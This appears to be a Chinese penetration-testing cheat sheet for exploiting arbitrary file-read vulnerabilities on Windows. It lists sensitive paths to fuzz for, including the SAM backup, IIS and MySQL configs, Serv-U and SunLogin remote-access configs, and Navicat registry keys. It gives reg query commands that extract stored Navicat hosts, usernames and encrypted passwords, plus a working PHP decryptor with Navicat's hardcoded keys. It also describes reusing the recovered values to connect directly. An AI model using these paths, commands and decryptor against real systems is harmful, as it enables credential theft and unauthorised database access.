任意文件读取漏洞-windows敏感文件路径字典fuzz

 

一般情况下读iis配置即可，获取路径，然后再读web.config
 

windows也有索引文件位置：

C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb

%LOCALAPPDATA%\Everything\Everything.db
C:\apache\conf\httpd.conf
c:\boot.ini
c:\mysql\data\mysql\user.MYD
c:\Program Files\ Serv-U\ServUAdmin.exe
c:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\mysql\data\mysql\user.MYD
C:\Program Files\mysql\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
c:\Program Files\Serv-U\ServUDaemon.ini
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb
C:\ProgramData\Oray\SunloginClient\config.ini
C:\ProgramData\Oray\SunloginClient\sys_config.ini
C:\ProgramData\Oray\SunloginClientLite\config.ini
c:\Resin\conf\resin.conf \usr\local\resin\conf\resin.conf
c:\Resin-3.0.14\conf\resin.conf
c:\windows\my.ini
c:\windows\php.ini
C:\windows\repair\sam
C:\WINDOWS\system32\inetsrv\MetaBase.xml
C:\WINDOWS\system32\inetstr\config\applicationHost.config
c:\winnt\my.ini
c:\winnt\php.ini
C:\WINNT\system32\inetsrv\MetaBase.bin
d:\APACHE\Apache2\conf\httpd.conf

命令行执行读： navicat配置连接信息

MySQL-->：HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers
MariaDB-->：HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers
MicrosoftSQL-->：HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers 
Oracle-->：HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers
PostgreSQL-->：HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers
SQLite-->：HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers

reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v host
reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd
reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v UserName
reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v port

可以解密：

代码在线运行 - 在线工具

<?php
class NavicatPassword
{
    protected $version = 0;
    protected $aesKey = 'libcckeylibcckey';
    protected $aesIv = 'libcciv libcciv ';
    protected $blowString = '3DC5CA39';
    protected $blowKey = null;
    protected $blowIv = null;
     
    public function __construct($version = 12)
{
        $this->version = $version;
        $this->blowKey = sha1('3DC5CA39', true);
        $this->blowIv = hex2bin('d9c7c3c8870d64bd');
    }
     
    public function encrypt($string)
{
        $result = FALSE;
        switch ($this->version) {
            case 11:
                $result = $this->encryptEleven($string);
                break;
            case 12:
                $result = $this->encryptTwelve($string);
                break;
            default:
                break;
        }
         
        return $result;
    }
     
    protected function encryptEleven($string)
{
        $round = intval(floor(strlen($string) / 8));
        $leftLength = strlen($string) % 8;
        $result = '';
        $currentVector = $this->blowIv;
         
        for ($i = 0; $i < $round; $i++) {
            $temp = $this->encryptBlock($this->xorBytes(substr($string, 8 * $i, 8), $currentVector));
            $currentVector = $this->xorBytes($currentVector, $temp);
            $result .= $temp;
        }
         
        if ($leftLength) {
            $currentVector = $this->encryptBlock($currentVector);
            $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector);
        }
         
        return strtoupper(bin2hex($result));
    }
     
    protected function encryptBlock($block)
{
        return openssl_encrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);
    }
     
    protected function decryptBlock($block)
{
        return openssl_decrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);
    }
     
    protected function xorBytes($str1, $str2)
{
        $result = '';
        for ($i = 0; $i < strlen($str1); $i++) {
            $result .= chr(ord($str1[$i]) ^ ord($str2[$i]));
        }
         
        return $result;
    }
     
    protected function encryptTwelve($string)
{
        $result = openssl_encrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
        return strtoupper(bin2hex($result));
    }
     
    public function decrypt($string)
{
        $result = FALSE;
        switch ($this->version) {
            case 11:
                $result = $this->decryptEleven($string);
                break;
            case 12:
                $result = $this->decryptTwelve($string);
                break;
            default:
                break;
        }
         
        return $result;
    }
     
    protected function decryptEleven($upperString)
{
        $string = hex2bin(strtolower($upperString));
         
        $round = intval(floor(strlen($string) / 8));
        $leftLength = strlen($string) % 8;
        $result = '';
        $currentVector = $this->blowIv;
         
        for ($i = 0; $i < $round; $i++) {
            $encryptedBlock = substr($string, 8 * $i, 8);
            $temp = $this->xorBytes($this->decryptBlock($encryptedBlock), $currentVector);
            $currentVector = $this->xorBytes($currentVector, $encryptedBlock);
            $result .= $temp;
        }
         
        if ($leftLength) {
            $currentVector = $this->encryptBlock($currentVector);
            $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector);
        }
         
        return $result;
    }
     
    protected function decryptTwelve($upperString)
{
        $string = hex2bin(strtolower($upperString));
        return openssl_decrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
    }
};
 
 
//需要指定版本两种，11或12
//$navicatPassword = new NavicatPassword(11);
$navicatPassword = new NavicatPassword(11);
 
//解密
//$decode = $navicatPassword->decrypt('15057D7BA390');
$decode = "密码：".$navicatPassword->decrypt('获取到的密码');
echo $decode."\n";
?>

https://www.nhooo.com/tool/java/

也可以navicat 本地随便建立一个连接，然后记事本替换加密项的值，直接连（连不上换版本操作）。